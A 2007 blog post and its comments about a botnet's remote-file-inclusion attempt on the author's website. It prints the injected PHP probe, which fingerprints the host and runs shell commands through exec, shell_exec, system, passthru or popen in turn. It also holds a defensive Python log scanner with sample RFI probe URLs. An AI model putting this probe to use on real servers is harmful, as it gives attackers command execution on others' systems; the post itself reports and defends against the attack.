Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again: the hackers are making another run at one of my websites, trying to inject PHP code into a site that doesn't even have PHP enabled, which is amusing at best.

The script they were trying to inject was located here:
Here's a copy of their PHP script for your viewing pleasure:
<?php
// Probe script as injected, reconstructed from the flattened copy: the braces and the
// function_exists() branch tests were lost in extraction and are restored here.
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt'): marker the bot looks for to confirm the code ran
echo "Uname:$ker<br>";   // fingerprint the host: kernel and OS
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt = "ipconfig -a"; }
else { $xeQt = "id"; }
echo $hitemup; // never assigned in the injected copy; prints nothing
// Tries each command-execution primitive in turn, so disabling only one of them does not stop it.
function ex($cfe)
{
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}
Here's a list of the botnet IPs involved in the attack, with reverse DNS, so you can see that any machine can be infected; it's pretty random:
not found: 3(NXDOMAIN)
not found: 3(NXDOMAIN)
;; connection timed out; no servers could be reached

It's a pretty random list of sites infected with this botnet, from locations throughout the world.

The bot blocker shut down all these attempts but I wonder what they'll try next time?
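As an added example (not code from the post or from the bot blocker it mentions), here is a small Python log scanner that flags the kind of probe described above: a request whose query string carries an absolute URL, which is what a bot sends when it hopes the target will include() a script hosted elsewhere. The log lines, the IP addresses (documentation ranges) and the file names such as xeQt.txt are constructed for the example; a 404 from a site with no PHP is still reported, because the point is to see which sources are scanning.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache "combined" log format (not taken from the post).
# Addresses come from the documentation ranges 203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Oct/2007:03:14:07 -0700] "GET /index.php?page=http://198.51.100.7/xeQt.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.11 - - [28/Oct/2007:03:14:09 -0700] "GET /cat.php?dir=http%3A%2F%2F198.51.100.7%2Fprobe.php%3F HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.5 - - [28/Oct/2007:03:15:00 -0700] "GET /about.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
192.0.2.6 - - [28/Oct/2007:03:15:02 -0700] "GET /search?q=http+proxies HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A query-string value that is itself an absolute URL is the signature of a
# remote-file-inclusion probe: the bot wants include()/require() to fetch its script.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group('target')).query
        # parse_qsl decodes one layer of percent-encoding; unquote() again so a
        # double-encoded "http%253A%252F%252F" payload is still caught.
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = unquote(value)
            if REMOTE_URL_RE.match(decoded):
                findings.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'param': name,
                    'included_url': decoded,
                    # A 404 (as on a site with no PHP at all) is still worth logging:
                    # it shows the source is part of a scanning botnet.
                    'status': int(m.group('status')),
                })
    return findings


def summarize_sources(findings):
    """Count attempts per source IP; a flat spread of single hits is the botnet pattern."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = find_rfi_attempts(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']} {h['time']} param={h['param']} url={h['included_url']} status={h['status']}")
    print(summarize_sources(hits))
```

The scanner deliberately keys on a decoded value that starts with a URL scheme rather than on the substring "http", so a legitimate search for "http proxies" in the fourth sample line is not reported; run it over a real access log and the per-IP summary gives the same kind of scattered source list the post describes.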


Jeremy said...

What did the script do?

What kind of site was it?

IncrediBILL said...

The site was hacked, they weren't involved.

The script is a type of shell script, the entry way into the server, it's a probe.

Ban Proxies said...

I ran this search else { $xeQt="id"; }.

I'm very curious what OS those hacked boxes are running.

Ban Proxies said...

Google Wireless Transcoder being used in a hacking attempt.

Log File
- Request contained a malicious JavaScript or SQL injection attack

- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+ Host: Referer: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: X-moz: prefetch

IP Whois = - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"

This is the hacker:
inetnum: -
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
remarks: Registered trough
mnt-by: RO-MNT
mnt-lower: RO-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687

I blocked about 6 months ago and the garbage still got through.